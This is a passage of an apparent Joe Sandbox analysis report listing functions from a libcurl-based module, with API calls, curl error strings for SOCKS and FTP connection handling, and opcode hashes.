                                                                                                                            • API ID: ErrorLastSleepgetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3033474312-0
                                                                                                                            • Opcode ID: 981614887e6f4e3990a0934c32735697c2cac64b467a01e1bb88bd669affa606
                                                                                                                            • Instruction ID: 1a04d7915d622916ff959933d586207f485dcb38849459008142b878a37478ad
                                                                                                                            • Opcode Fuzzy Hash: 981614887e6f4e3990a0934c32735697c2cac64b467a01e1bb88bd669affa606
                                                                                                                            • Instruction Fuzzy Hash: 79F062B4640209EBEF10CFA1C8457AF7BBCEB02701F3040A5E9149A280D7B9E6059B62
                                                                                                                            Function 6B6C1050 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001,?,?,00000000,00000048), ref: 6B6C115D
                                                                                                                            Strings
                                                                                                                            • getaddrinfo() thread failed to start, xrefs: 6B6C11AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                            • String ID: getaddrinfo() thread failed to start
                                                                                                                            • API String ID: 32694325-737161664
                                                                                                                            • Opcode ID: d7c0f14cf1dcaa2895762afdd043dbba35dc4c173aad8b0f5260942afae8b6a4
                                                                                                                            • Instruction ID: d5907aff6c7e7cad9d9b896a3c74404a97b10d48d0623e5cbe7b3ff73e920cc7
                                                                                                                            • Opcode Fuzzy Hash: d7c0f14cf1dcaa2895762afdd043dbba35dc4c173aad8b0f5260942afae8b6a4
                                                                                                                            • Instruction Fuzzy Hash: D25102B0D00216EBEB009F64DD4578A7BB4FF05305F048275ED08AF291EB79E5A4CBA2
                                                                                                                            Function 6B6EA660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ioctlsocket
                                                                                                                            • String ID: TElk
                                                                                                                            • API String ID: 3577187118-5412025
                                                                                                                            • Opcode ID: 777a9e0a120773bd9c12984bca9776edbeec28584b1393350a1fcef7df128116
                                                                                                                            • Instruction ID: 279cae252922e87f3b8a67348f99b97c5e077ee9ae74560c35b77968098e0aae
                                                                                                                            • Opcode Fuzzy Hash: 777a9e0a120773bd9c12984bca9776edbeec28584b1393350a1fcef7df128116
                                                                                                                            • Instruction Fuzzy Hash: 6ED0EA7240120CEFCB019EB1D8059DA7BADEA08225B01C43AB9299A121EB35EA65DF95
                                                                                                                            Function 6B6E7990 Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSACloseEvent.WS2_32(50000000), ref: 6B6E7A66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEvent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2624557715-0
                                                                                                                            • Opcode ID: 3f94b156909a17b129d85bdbadd28921d77b4c41217619fdb8ceb5482eb37a57
                                                                                                                            • Instruction ID: 596b34a400ba2a8053a04f5327cd3ac84727bacf5fb03c3bc136459c4800a429
                                                                                                                            • Opcode Fuzzy Hash: 3f94b156909a17b129d85bdbadd28921d77b4c41217619fdb8ceb5482eb37a57
                                                                                                                            • Instruction Fuzzy Hash: 1F2125B28066109BEB218F70DC85BAB7BECFF04318F0404A9EA185B186D77AE545C7B5
                                                                                                                            Function 6B6C2370 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_easy_init
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4195830768-0
                                                                                                                            • Opcode ID: 6835e8f418b762be03355f4502828c7c85d0bf8bb874fe3edcabbfc67356e05b
                                                                                                                            • Instruction ID: 70ddd35908b2cc42aa31a5223a20f0c134f9f04f7269c9453a9ab095f70fcdb6
                                                                                                                            • Opcode Fuzzy Hash: 6835e8f418b762be03355f4502828c7c85d0bf8bb874fe3edcabbfc67356e05b
                                                                                                                            • Instruction Fuzzy Hash: 65F0B4B33001146BD7005AA9AC80AEBF798FB80178B400177F90CC7601D76AE51146E6
                                                                                                                            Function 6B71F78D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,6B71F6DD,00000001,00000364,00000015,000000FF), ref: 6B71F7CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: af2e8038ee0a37df2c0c973657565df9b8b4418a7d3a2d7186417e2f8c926c23
                                                                                                                            • Instruction ID: 9b960bd6782b4d3bfb54dba0ec9b74e7ca7c6a24ce8ce7ce35e8959f98cf90ac
                                                                                                                            • Opcode Fuzzy Hash: af2e8038ee0a37df2c0c973657565df9b8b4418a7d3a2d7186417e2f8c926c23
                                                                                                                            • Instruction Fuzzy Hash: 90F0B43264D52557EB116A769F45F4E7748BF82B71F994073F824AE980DB7CD80046B0
                                                                                                                            Function 6B6D8A20 Relevance: 1.5, APIs: 1, Instructions: 26networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000017,00000002,00000000), ref: 6B6D8A3D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: socket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 98920635-0
                                                                                                                            • Opcode ID: ca6380a81f37ac30c7b45174390560f6c3f87d352932611ece0b3fcd15a21b82
                                                                                                                            • Instruction ID: 862a37d50e8fece41468c9ab4c59a603f00a3145c60c0ca5b08fe1a4ab7a2709
                                                                                                                            • Opcode Fuzzy Hash: ca6380a81f37ac30c7b45174390560f6c3f87d352932611ece0b3fcd15a21b82
                                                                                                                            • Instruction Fuzzy Hash: 32E086742843046AE9004AA8AC46FE537D84B05725F4452E1F52C9F6F1C761E841A661

                                                                                                                            Non-executed Functions

                                                                                                                            Function 6B6CEEA0 Relevance: 63.7, APIs: 23, Strings: 13, Instructions: 663networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CEFA1
                                                                                                                            • _strncpy.LIBCMT ref: 6B6CEFC7
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CEFE8
                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B6CF006
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CF078
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CF0A9
                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,00000000,00000401), ref: 6B6CF135
                                                                                                                            • getsockname.WS2_32(?,?,?), ref: 6B6CF1CC
                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B6CF1E2
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6CF2ED
                                                                                                                            • bind.WS2_32(FFFFFFFF,00000017,00000080), ref: 6B6CF396
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6CF3A4
                                                                                                                            • getsockname.WS2_32(?,00000017,00000080), ref: 6B6CF407
                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B6CF452
                                                                                                                              • Part of subcall function 6B6FA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B6FA0E7
                                                                                                                              • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$___from_strstr_to_strchr$getsockname$_strncpybindcurl_mvsnprintfcurl_pushheader_bynuminet_pton
                                                                                                                            • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                                                                                                            • API String ID: 1437543408-2383553807
                                                                                                                            • Opcode ID: 1b45e6247f2ea19263b19b467038a5306abcc8995438a904f3c83bc1c0f1910b
                                                                                                                            • Instruction ID: e497d2d7e6369d43606155165a06c8afcfac8610740c287c0d06fe8494a88be3
                                                                                                                            • Opcode Fuzzy Hash: 1b45e6247f2ea19263b19b467038a5306abcc8995438a904f3c83bc1c0f1910b
                                                                                                                            • Instruction Fuzzy Hash: F732E6F1D441299BDB208F34CD45BEFB7BAEF45304F0441E6E818A3141DB3A9A958FA6
                                                                                                                            Function 6B6F75D0 Relevance: 56.9, APIs: 1, Strings: 31, Instructions: 939COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • SOCKS5 GSSAPI per-message authentication is not supported., xrefs: 6B6F7A2F
                                                                                                                            • SOCKS5 connect to IPv6 %s (locally resolved), xrefs: 6B6F7EB5
                                                                                                                            • SOCKS5 GSS-API protection not yet implemented., xrefs: 6B6F802E
                                                                                                                            • Unable to send initial SOCKS5 request., xrefs: 6B6F78B0
                                                                                                                            • Failed to resolve "%s" for SOCKS5 connect., xrefs: 6B6F7F06
                                                                                                                            • connection to proxy closed, xrefs: 6B6F821A
                                                                                                                            • Received invalid version in initial SOCKS5 response., xrefs: 6B6F7940
                                                                                                                            • Connection to proxy closed, xrefs: 6B6F790D
                                                                                                                            • SOCKS5 connection to %s not supported, xrefs: 6B6F7EDE
                                                                                                                            • Unable to receive initial SOCKS5 response., xrefs: 6B6F7861
                                                                                                                            • SOCKS5 reply has wrong version, version should be 5., xrefs: 6B6F80DE
                                                                                                                            • warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu, xrefs: 6B6F7737
                                                                                                                            • unknown, xrefs: 6B6F760C
                                                                                                                            • Can't complete SOCKS5 connection to %s. (%d), xrefs: 6B6F8118
                                                                                                                            • Unable to receive SOCKS5 sub-negotiation response., xrefs: 6B6F7C2C
                                                                                                                            • :%d, xrefs: 6B6F7D63
                                                                                                                            • Failed to send SOCKS5 sub-negotiation request., xrefs: 6B6F7BA7
                                                                                                                            • Excessive user name length for proxy auth, xrefs: 6B6F7AC3
                                                                                                                            • Excessive password length for proxy auth, xrefs: 6B6F7B23
                                                                                                                            • Undocumented SOCKS5 mode attempted to be used by server., xrefs: 6B6F7A7B
                                                                                                                            • SOCKS5 request granted., xrefs: 6B6F8259
                                                                                                                            • User was rejected by the SOCKS5 server (%d %d)., xrefs: 6B6F7C75
                                                                                                                            • SOCKS5: connecting to HTTP proxy %s port %d, xrefs: 6B6F76ED
                                                                                                                            • SOCKS5 connect to IPv4 %s (locally resolved), xrefs: 6B6F7DD3
                                                                                                                            • Failed to send SOCKS5 connect request., xrefs: 6B6F7FED
                                                                                                                            • SOCKS5 reply has wrong address type., xrefs: 6B6F81F2
                                                                                                                            • Unable to negotiate SOCKS5 GSS-API context., xrefs: 6B6F7A0B
                                                                                                                            • No authentication method was acceptable., xrefs: 6B6F7A57
                                                                                                                            • SOCKS5 connect to %s:%d (remotely resolved), xrefs: 6B6F7F70
                                                                                                                            • SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu], xrefs: 6B6F7712
                                                                                                                            • Failed to receive SOCKS5 connect request ack., xrefs: 6B6F809F, 6B6F81CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                            • String ID: :%d$Can't complete SOCKS5 connection to %s. (%d)$Connection to proxy closed$Excessive password length for proxy auth$Excessive user name length for proxy auth$Failed to receive SOCKS5 connect request ack.$Failed to resolve "%s" for SOCKS5 connect.$Failed to send SOCKS5 connect request.$Failed to send SOCKS5 sub-negotiation request.$No authentication method was acceptable.$Received invalid version in initial SOCKS5 response.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 GSSAPI per-message authentication is not supported.$SOCKS5 connect to %s:%d (remotely resolved)$SOCKS5 connect to IPv4 %s (locally resolved)$SOCKS5 connect to IPv6 %s (locally resolved)$SOCKS5 connection to %s not supported$SOCKS5 reply has wrong address type.$SOCKS5 reply has wrong version, version should be 5.$SOCKS5 request granted.$SOCKS5: connecting to HTTP proxy %s port %d$SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu]$Unable to negotiate SOCKS5 GSS-API context.$Unable to receive SOCKS5 sub-negotiation response.$Unable to receive initial SOCKS5 response.$Unable to send initial SOCKS5 request.$Undocumented SOCKS5 mode attempted to be used by server.$User was rejected by the SOCKS5 server (%d %d).$connection to proxy closed$unknown$warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu
                                                                                                                            • API String ID: 2260702874-704893380
                                                                                                                            • Opcode ID: 0851273c1541cd4f14c99f572d6e0348699a05097cadfa74c9acab4f8c678770
                                                                                                                            • Instruction ID: 5bcd9b2f627002fd029f5d6b3e9b39333978a6e68e534618973b2db79b604ce2
                                                                                                                            • Opcode Fuzzy Hash: 0851273c1541cd4f14c99f572d6e0348699a05097cadfa74c9acab4f8c678770
                                                                                                                            • Instruction Fuzzy Hash: 79621CB1A042189BDB11CF28DD817FEB7BAEF45304F0040EEE85D97241DB3A9A56CB61
                                                                                                                            Function 6B6C39A0 Relevance: 37.1, APIs: 13, Strings: 8, Instructions: 395networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,?), ref: 6B6C3AC2
                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B6C3BA2
                                                                                                                            • htons.WS2_32(?), ref: 6B6C3BB9
                                                                                                                            • inet_pton.WS2_32(00000002,?,?), ref: 6B6C3CED
                                                                                                                            • htons.WS2_32(?), ref: 6B6C3D08
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B6C3DAF
                                                                                                                            • htons.WS2_32(?), ref: 6B6C3DE9
                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B6C3E02
                                                                                                                            • getsockname.WS2_32(?,?,00000080), ref: 6B6C3E3D
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C3E4B
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C3E91
                                                                                                                            Strings
                                                                                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 6B6C3C90
                                                                                                                            • Couldn't bind to interface '%s', xrefs: 6B6C3BE4
                                                                                                                            • Bind to local port %hu failed, trying next, xrefs: 6B6C3DD9
                                                                                                                            • Local Interface %s is ip %s using address family %i, xrefs: 6B6C3B78
                                                                                                                            • bind failed with errno %d: %s, xrefs: 6B6C3EB3
                                                                                                                            • Local port: %hu, xrefs: 6B6C3EDB
                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 6B6C3E6D
                                                                                                                            • Couldn't bind to '%s', xrefs: 6B6C3D26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: htons$ErrorLastbindinet_pton$curl_msnprintfcurl_mvsnprintfcurl_pushheader_bynumgetsockname
                                                                                                                            • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                            • API String ID: 2165106075-2769131373
                                                                                                                            • Opcode ID: 12a3e8f1ad1751b7cab029b7c2e9e8b92530792cad9b6f586087a5ba117c7658
                                                                                                                            • Instruction ID: e794cad269dd7a117160360431eada0313b59a455868a1be38a47efcfdc64174
                                                                                                                            • Opcode Fuzzy Hash: 12a3e8f1ad1751b7cab029b7c2e9e8b92530792cad9b6f586087a5ba117c7658
                                                                                                                            • Instruction Fuzzy Hash: 0EE1B3B5A012199BDB20DF64DD89BEA77B8EF05304F0040EAF90DD7241EB39AE458F61
                                                                                                                            Function 6B6F6F40 Relevance: 33.8, APIs: 1, Strings: 18, Instructions: 550COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Failed to resolve "%s" for SOCKS4 connect., xrefs: 6B6F71FD
                                                                                                                            • SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 6B6F7188
                                                                                                                            • Too long SOCKS proxy user name, can't use!, xrefs: 6B6F70C9
                                                                                                                            • SOCKS4 non-blocking resolve of %s, xrefs: 6B6F7064
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 6B6F756A
                                                                                                                            • connection to proxy closed, xrefs: 6B6F73BA
                                                                                                                            • SOCKS4: too long host name, xrefs: 6B6F72F5
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 6B6F7495
                                                                                                                            • SOCKS4: Failed receiving connect request ack: %s, xrefs: 6B6F7392
                                                                                                                            • SOCKS4 connection to %s not supported, xrefs: 6B6F71D6
                                                                                                                            • SOCKS4 reply has wrong version, version should be 0., xrefs: 6B6F7403
                                                                                                                            • Hostname '%s' was found, xrefs: 6B6F7113
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 6B6F74DC
                                                                                                                            • SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 6B6F6FF6
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 6B6F7523
                                                                                                                            • Failed to send SOCKS4 connect request., xrefs: 6B6F72D1
                                                                                                                            • SOCKS4%s request granted., xrefs: 6B6F744B
                                                                                                                            • SOCKS4 communication to %s:%d, xrefs: 6B6F700A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                            • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$Hostname '%s' was found$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$SOCKS4: Failed receiving connect request ack: %s$SOCKS4: too long host name$Too long SOCKS proxy user name, can't use!$connection to proxy closed
                                                                                                                            • API String ID: 3418963191-1991471026
                                                                                                                            • Opcode ID: 786f8fb77a13ea1b695f09e6208dab12a6fff2882cc3fca62778f48e9d966526
                                                                                                                            • Instruction ID: 9096bc81674050eaca7e689cea88c8682e698069041d2766327ddfd9c0a66994
                                                                                                                            • Opcode Fuzzy Hash: 786f8fb77a13ea1b695f09e6208dab12a6fff2882cc3fca62778f48e9d966526
                                                                                                                            • Instruction Fuzzy Hash: E41217F1A042049FCB14CFB8DD51BBEFBFAEF05305F0441AAE85996242DB39A515C760
                                                                                                                            Function 6B6FAE50 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 164libraryloadernetworkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 6B6FAE75
                                                                                                                            • WSACleanup.WS2_32 ref: 6B6FAE90
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,?,?), ref: 6B6FAEBF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B6FAEDD
                                                                                                                            • _strpbrk.LIBCMT ref: 6B6FAEEF
                                                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?), ref: 6B6FAF16
                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6B6FAF2D
                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6B6FAF50
                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,?), ref: 6B6FAF7E
                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 6B6FAFDB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6B6FAFFE
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(6B743B50,?,?,?,?,?,?), ref: 6B6FB033
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
